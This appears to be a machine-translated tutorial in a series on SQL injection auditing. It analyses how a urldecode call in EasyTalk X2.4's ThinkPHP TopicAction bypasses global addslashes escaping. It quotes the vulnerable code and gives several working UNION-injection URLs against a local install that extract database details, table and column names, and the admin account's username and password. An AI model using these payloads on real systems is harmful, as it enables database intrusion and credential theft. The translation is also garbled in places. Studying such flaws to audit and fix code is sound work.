0x01 background
Today's web programs basically have a global filter for SQL injection, like PHP to open the GPC or on the global file common.php using the Addslashes () function to filter the received parameters, especially single quotes. In this case we need to find some code decoding function to bypass the global protection, this article is about UrlDecode (), the same Daniel please consciously detour ~
The loophole comes from dark clouds: http://www.wooyun.org/bugs/wooyun-2014-050338
0X02 Environment Construction
Look at the background we used the lower version of the Easytalk program, the version is X2.4
① source I packed a copy: Http://pan.baidu.com/s/1bopOFNL
② Extract to www easytalk directory, follow the prompts step by step installation can, encounter problems themselves Baidu or Google, after successful visits such as:
0X03 Vulnerability Analysis
First look at the source structure, with the thinkphp framework, more complex:
Interested can go to study and then continue to look down, the novice can know that the thinkphp to receive the parameters are filtered, and depending on whether your server open GPC will do the appropriate processing:
1./thinkphp/extend/library/org/util/input.class.php file Line No. 266:
/** +---------------------------------------------------------- * If MAGIC_QUOTES_GPC is off, this function can escape the string +---------------------------------------------------------- *@access Public +---------------------------------------------------------- *@param string $string to be processed +---------------------------------------------------------- * @return String +---------------------------------------------------------- */ static public function addslashes($string) { if (!GET_MAGIC_QUOTES_GPC ()) { $string = addslashes ($string); } return $string; }
|
2. Use the global search function of the Seay code audit system to search for files that contain the keyword "UrlDecode", and find that TopicAction.class.php contains a place to urldecode the received parameters keyword and have SQL queries:
3. We follow up this PHP file and find that receiving keyword UrlDecode transcoding, and then immediately bring in the query, causing the injection:
PublicfunctionTopic() { $keyword =$this->_get (' Keyword ',' UrlDecode ');UrlDecode the Received keyword parameters using the _get from the thinkphp frame (see http://doc.thinkphp.cn/manual/get_system_var.html) if ($keyword) { $topic = D (' Topic ')->where ("Topicname= ' $keyword '")->find ();OK, bring in the query. if ($topic) { $isfollow = D (' Mytopic ')->isfollow ($topic [' ID '],$this->my[' user_id ']); $topicusers = D (' Mytopicview ')->where ("Topicid= ' $topic [id] '")->order (' id desc ')->limit (9)->select (); $widget = M (' Topicwidget ')->where ("Topicid= ' $topic [id] '")->order (' Order ' ASC ')->select (); if ($widget) { foreach ($widgetAs$val) { $topicwidget [$val [' Widgettype ']][] =$val; } } $this->assign (' Topicwidget ',$topicwidget); }else { $count =$isfollow =0; }
$this->assign (' Comefrom ',' topic '); $this->assign (' Keyword ',$keyword); $this->assign ( ' topic ', $topic); $this->assign ( ' topicusers ', $topicusers); $this->assign ( ' Isfollow ', $isfollow); $this->assign ( ' SubName ', ' # '. $keyword. ' # '); $this->display (); else { '/?m=topic&a=index '); /span> |
0x04 Vulnerability Proof
1. We construct a POC that obtains information about the database:
http://localhost/eazytalk/?m=topic&a=topic&keyword=aaa%2527 and 1=2 union select 1,2,3,concat(database(),0x5c,user(),0x5c,version()),5 %23
The following information was successfully obtained:
View the MySQL log below and discover that the SQL statement was executed successfully:
2. We construct a POC that gets the database Eazytalk all tables:
http://localhost/eazytalk/?m=topic&a=topic&keyword=aaa%2527 and 1=2 union select 1,2,3, (select GROUP_CONCAT(DISTINCT table_name) from information_schema.tables where table_schema=0x6561737974616C6B),5%23
All table information is successfully obtained as follows:
4. Construct the POC that gets all the field information for the table et_users:
http://localhost/eazytalk/?m=topic&a=topic&keyword=aaa%2527 and 1=2 union select 1,2,3, (select GROUP_CONCAT(DISTINCT column_name) from information_schema.columns where table_name=0x65745F7573657273),5%23
Successful Get table et_users all field information is as follows:
5. Construct the POC that obtains the first account of the Et_users table:
http://localhost/eazytalk/?m=topic&a=topic&keyword=aaa%2527 and 1=2 union select 1,2,3, (select GROUP_CONCAT(DISTINCT user_name,0x5f,password) from et_users limit 0,1),5%23
The account password for successfully getting the table admin is as follows:
Those years we dug together SQL injection-2. Global Protection Bypass UrlDecode